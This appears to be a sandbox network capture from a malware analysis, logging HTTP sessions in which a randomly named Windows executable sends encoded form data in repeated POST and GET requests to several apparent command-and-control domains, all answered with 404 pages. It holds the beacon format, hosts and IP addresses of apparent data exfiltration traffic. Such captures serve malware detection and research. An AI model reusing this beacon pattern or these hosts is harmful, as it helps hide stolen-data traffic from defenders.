Timestamp: Dec 6, 2024 17:37:14.911601067 CET | Bytes transferred: 515 | Direction: OUT
GET /4ii9/?RZ=0nkpmZbx9Z4P2&BHptZ6F=DCK/bgCIPtpt2RJApr/S57a5c6dyUmc4/YRC2H7mEi+GV8MabGqvART7ZhzmedatEBHVT2HbXE2R9ehhzokwzGc74R/EcNhRi8s6fgxoYqpZFSK7yfL6tiw= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.happyjam.life
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Timestamp: Dec 6, 2024 17:37:16.122333050 CET | Bytes transferred: 548 | Direction: IN
HTTP/1.1 404 Not Found
Date: Fri, 06 Dec 2024 16:37:15 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 17 | Source IP: 192.168.2.12 | Source Port: 49789 | Destination IP: 38.47.207.164 | Destination Port: 80 | PID: 5356 | Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe

Timestamp: Dec 6, 2024 17:37:21.828545094 CET | Bytes transferred: 769 | Direction: OUT
POST /sa1b/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.t19yd.top
Origin: http://www.t19yd.top
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 204
Referer: http://www.t19yd.top/sa1b/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Data Ascii: BHptZ6F=aavpWf/DMtk8+imFwKpHkHCzRq7SKOKDceuhH5T6omDm55goG+Y7VV83QWBb5mVdmy/tSgobXxCn+s5bFPZRbDok4tyYEbX3cnUQZ/LixA91eryKlYksbvIA8tZ4OL+k5XBXuY+bMUzY5eKFsS82HDPojwD8pp4/m0faxEOS/sh71lNVYpJ05kqkk2dTezHBQw==

Timestamp: Dec 6, 2024 17:37:23.345650911 CET | Bytes transferred: 302 | Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 06 Dec 2024 16:37:23 GMT
Content-Type: text/html
Content-Length: 138
Connection: close
ETag: "6693de8b-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 18 | Source IP: 192.168.2.12 | Source Port: 49794 | Destination IP: 38.47.207.164 | Destination Port: 80 | PID: 5356 | Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe

Timestamp: Dec 6, 2024 17:37:24.490030050 CET | Bytes transferred: 789 | Direction: OUT
POST /sa1b/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.t19yd.top
Origin: http://www.t19yd.top
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 224
Referer: http://www.t19yd.top/sa1b/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Data Ascii: BHptZ6F=aavpWf/DMtk84C2FytdHinCwfK7SEuKHceShH7+irUXm5YwoH8g7Y183JmBa3GVsmyzfSi8bXwin+uxbF8heYzomzNyWK7X3cnUQZ/vIxBV1ZbiKn9IjSPIPo9Z4KL+e5XB1uZi9MWbY5cSFsnI3MDPuuQCun8AxhXHOs3nyhvdN9DAPHbBisn+pphkjTw6IL0e5jwK5kN10qVkq88ymhh4=

Timestamp: Dec 6, 2024 17:37:26.010193110 CET | Bytes transferred: 302 | Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 06 Dec 2024 16:37:25 GMT
Content-Type: text/html
Content-Length: 138
Connection: close
ETag: "6693de8b-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 19 | Source IP: 192.168.2.12 | Source Port: 49800 | Destination IP: 38.47.207.164 | Destination Port: 80 | PID: 5356 | Process: C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe

Timestamp: Dec 6, 2024 17:37:27.162319899 CET | Bytes transferred: 1802 | Direction: OUT
POST /sa1b/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.t19yd.top
Origin: http://www.t19yd.top
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 1236
Referer: http://www.t19yd.top/sa1b/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Data Ascii: BHptZ6F= [TRUNCATED]

Timestamp: Dec 6, 2024 17:37:28.696182013 CET | Bytes transferred: 302 | Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 06 Dec 2024 16:37:28 GMT
Content-Type: text/html
Content-Length: 138
Connection: close
ETag: "6693de8b-8a"
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.12 | 49809 | 38.47.207.164 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:37:29.829133987 CET | 511 | OUT | GET /sa1b/?BHptZ6F=XYHJVoT0LuIOm26Tyq9N91avW6u0HKWTSvSmIrnltmLk6JYzFfgCVHRXJm9nnHtkqw/GQg9hdUic1chKWcYHIwgC/tmXBuLbW2sUc5PcpWY1XILnhN44V5I=&RZ=0nkpmZbx9Z4P2 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.t19yd.top
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Dec 6, 2024 17:37:31.396498919 CET | 302 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 06 Dec 2024 16:37:31 GMT
Content-Type: text/html
Content-Length: 138
Connection: close
ETag: "6693de8b-8a"
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.12 | 49827 | 208.115.225.220 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:37:37.583045006 CET | 790 | OUT | POST /gua3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.atendefacil.info
Origin: http://www.atendefacil.info
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 204
Referer: http://www.atendefacil.info/gua3/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 43 47 73 52 51 5a 44 31 63 32 4c 54 54 35 68 65 6c 77 53 53 53 53 53 77 6d 2b 35 5a 62 55 4f 66 45 58 69 56 74 42 55 55 5a 4a 69 6f 6d 6f 74 6a 69 69 52 61 30 32 4b 6e 48 7a 49 35 33 55 74 66 50 6d 69 4b 69 65 53 67 65 52 69 78 46 33 39 53 57 64 6b 38 72 31 6e 70 46 33 47 36 6d 72 6c 64 4d 4b 37 72 4a 66 4d 74 55 44 37 59 48 48 61 2f 70 61 7a 34 6e 68 2f 2b 6c 4f 57 2b 33 63 69 42 79 65 78 37 6f 39 33 48 47 4b 53 4b 41 4a 4f 7a 68 58 43 75 6c 6a 45 7a 49 63 77 54 46 64 35 46 47 73 63 78 4d 50 62 48 55 49 53 57 35 4e 58 34 46 47 70 48 4b 67 34 43 2b 55 61 43 52 53 72 33 78 77 3d 3d
                                                                            Data Ascii: BHptZ6F=CGsRQZD1c2LTT5helwSSSSSwm+5ZbUOfEXiVtBUUZJiomotjiiRa02KnHzI53UtfPmiKieSgeRixF39SWdk8r1npF3G6mrldMK7rJfMtUD7YHHa/paz4nh/+lOW+3ciByex7o93HGKSKAJOzhXCuljEzIcwTFd5FGscxMPbHUISW5NX4FGpHKg4C+UaCRSr3xw==
Dec 6, 2024 17:37:38.720045090 CET | 481 | IN | HTTP/1.1 404 Not Found
Date: Fri, 06 Dec 2024 16:37:38 GMT
Server: Apache/2
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.12 | 49833 | 208.115.225.220 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:37:40.258650064 CET | 810 | OUT | POST /gua3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.atendefacil.info
Origin: http://www.atendefacil.info
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 224
Referer: http://www.atendefacil.info/gua3/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 43 47 73 52 51 5a 44 31 63 32 4c 54 53 59 52 65 70 7a 36 53 5a 53 53 76 73 65 35 5a 42 6b 4f 62 45 58 75 56 74 46 4e 5a 5a 66 79 6f 6e 4c 35 6a 6a 6a 52 61 7a 32 4b 6e 50 54 49 38 7a 55 74 71 50 6d 6e 33 69 65 75 67 65 52 32 78 46 30 70 53 58 75 63 2f 78 46 6e 72 4f 58 47 43 37 62 6c 64 4d 4b 37 72 4a 66 5a 47 55 43 54 59 48 58 71 2f 6f 37 7a 33 37 78 2f 2f 7a 2b 57 2b 7a 63 6a 70 79 65 77 63 6f 2f 43 63 47 4d 65 4b 41 49 2b 7a 67 43 75 74 73 6a 45 31 57 73 78 59 42 65 67 4c 65 63 42 2b 50 5a 6e 61 56 63 69 71 38 4c 61 69 61 30 68 52 66 6a 73 50 7a 44 6a 79 63 52 57 2b 71 35 37 39 6e 59 6a 34 48 5a 2f 69 36 65 35 43 38 56 4b 4a 67 5a 4d 3d
                                                                            Data Ascii: BHptZ6F=CGsRQZD1c2LTSYRepz6SZSSvse5ZBkObEXuVtFNZZfyonL5jjjRaz2KnPTI8zUtqPmn3ieugeR2xF0pSXuc/xFnrOXGC7bldMK7rJfZGUCTYHXq/o7z37x//z+W+zcjpyewco/CcGMeKAI+zgCutsjE1WsxYBegLecB+PZnaVciq8Laia0hRfjsPzDjycRW+q579nYj4HZ/i6e5C8VKJgZM=
Dec 6, 2024 17:37:41.387670040 CET | 481 | IN | HTTP/1.1 404 Not Found
Date: Fri, 06 Dec 2024 16:37:41 GMT
Server: Apache/2
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.12 | 49843 | 208.115.225.220 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:37:42.931548119 CET | 1823 | OUT | POST /gua3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.atendefacil.info
Origin: http://www.atendefacil.info
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 1236
Referer: http://www.atendefacil.info/gua3/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 43 47 73 52 51 5a 44 31 63 32 4c 54 53 59 52 65 70 7a 36 53 5a 53 53 76 73 65 35 5a 42 6b 4f 62 45 58 75 56 74 46 4e 5a 5a 66 36 6f 6d 37 6c 6a 6c 41 35 61 79 32 4b 6e 54 44 49 39 7a 55 74 4e 50 6e 43 77 69 65 69 57 65 54 4f 78 45 55 31 53 65 37 77 2f 2f 31 6e 72 54 48 47 35 6d 72 6b 46 4d 4b 71 69 4a 66 4a 47 55 43 54 59 48 56 43 2f 76 71 7a 33 6f 42 2f 2b 6c 4f 57 36 33 63 6a 53 79 66 56 6a 6f 2f 58 70 47 38 2b 4b 42 6f 75 7a 74 55 36 74 6a 6a 45 33 58 73 77 59 42 65 63 41 65 63 63 42 50 64 6e 67 56 62 4f 71 2b 4b 36 2b 4a 31 35 36 4a 6c 6f 54 78 52 44 31 45 6d 76 7a 70 4c 33 53 76 75 50 48 45 34 61 79 35 4e 73 6c 6e 6e 7a 50 2f 2f 50 78 43 30 54 4e 39 2b 38 52 70 56 5a 69 68 36 52 30 72 61 63 48 4c 68 66 69 44 7a 65 47 76 57 41 79 66 4f 44 6e 4b 77 43 6f 38 51 56 6a 76 32 66 37 37 43 76 62 4f 4b 71 46 4f 32 39 67 66 61 48 75 63 47 45 33 56 4f 2f 4c 71 51 65 44 61 71 72 48 2f 65 45 36 50 70 69 41 39 62 73 30 63 69 75 66 51 63 47 4c 76 4b 47 62 51 4d 45 30 34 36 50 4d 7a 52 [TRUNCATED]
Data Ascii: BHptZ6F=[TRUNCATED]
Dec 6, 2024 17:37:44.065747976 CET | 481 | IN | HTTP/1.1 404 Not Found
Date: Fri, 06 Dec 2024 16:37:43 GMT
Server: Apache/2
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.12 | 49849 | 208.115.225.220 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:37:45.604543924 CET | 518 | OUT | GET /gua3/?RZ=0nkpmZbx9Z4P2&BHptZ6F=PEExTvPebnfdN5xst02JMzGti5FnGkiLE22WiywfEIelsbdwqCVd6ByVLBEklw1lRQ+mhNbJQBi9PlJBFsZX42nwE3ew6u8Wba+OVKdJMXKWWGbfqYbjt0U= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.atendefacil.info
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Dec 6, 2024 17:37:46.782130003 CET | 481 | IN | HTTP/1.1 404 Not Found
Date: Fri, 06 Dec 2024 16:37:46 GMT
Server: Apache/2
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.12 | 49886 | 172.67.162.39 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:38:01.163803101 CET | 790 | OUT | POST /k4tn/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.sitioseguro.blog
Origin: http://www.sitioseguro.blog
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 204
Referer: http://www.sitioseguro.blog/k4tn/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                            Data Raw: 42 48 70 74 5a 36 46 3d 5a 75 62 52 76 67 65 38 56 62 54 6b 7a 53 67 32 4c 39 61 4b 52 5a 6e 5a 30 77 69 6b 4c 75 43 57 51 38 2b 68 7a 4c 70 77 67 44 35 6c 63 59 4a 64 35 6f 32 2b 4d 4a 34 41 49 53 50 6f 48 39 48 4f 76 6e 78 69 6d 77 6b 55 6c 64 4a 2b 47 75 47 53 47 48 75 39 59 41 79 58 39 42 44 61 74 4e 6f 37 71 78 4a 75 31 66 64 45 35 64 4f 45 38 30 77 2b 64 75 5a 4b 67 6a 31 69 6c 32 73 72 53 4a 72 77 36 34 34 31 50 70 2f 61 39 61 66 39 43 2b 73 4c 2b 4f 42 34 79 41 62 67 65 4e 41 4d 50 31 6a 4d 77 35 6b 2b 48 74 49 47 73 79 38 52 7a 6a 6e 55 65 57 37 75 64 73 72 36 63 31 2f 32 73 4a 65 6b 67 51 3d 3d
                                                                            Data Ascii: BHptZ6F=ZubRvge8VbTkzSg2L9aKRZnZ0wikLuCWQ8+hzLpwgD5lcYJd5o2+MJ4AISPoH9HOvnximwkUldJ+GuGSGHu9YAyX9BDatNo7qxJu1fdE5dOE80w+duZKgj1il2srSJrw6441Pp/a9af9C+sL+OB4yAbgeNAMP1jMw5k+HtIGsy8RzjnUeW7udsr6c1/2sJekgQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.12 | 49892 | 172.67.162.39 | 80 | 5356 | C:\Program Files (x86)\VrozKvDIOQulSNMsSlPiPHmAbkHAfHeGfhdKqzkgewzRbyIGCfPlReNOqpymmgGsckKxwqTutuPyxG\RsbLJIqaDYs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 17:38:03.833421946 CET | 810 | OUT | POST /k4tn/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Host: www.sitioseguro.blog
Origin: http://www.sitioseguro.blog
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Connection: close
Content-Length: 224
Referer: http://www.sitioseguro.blog/k4tn/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
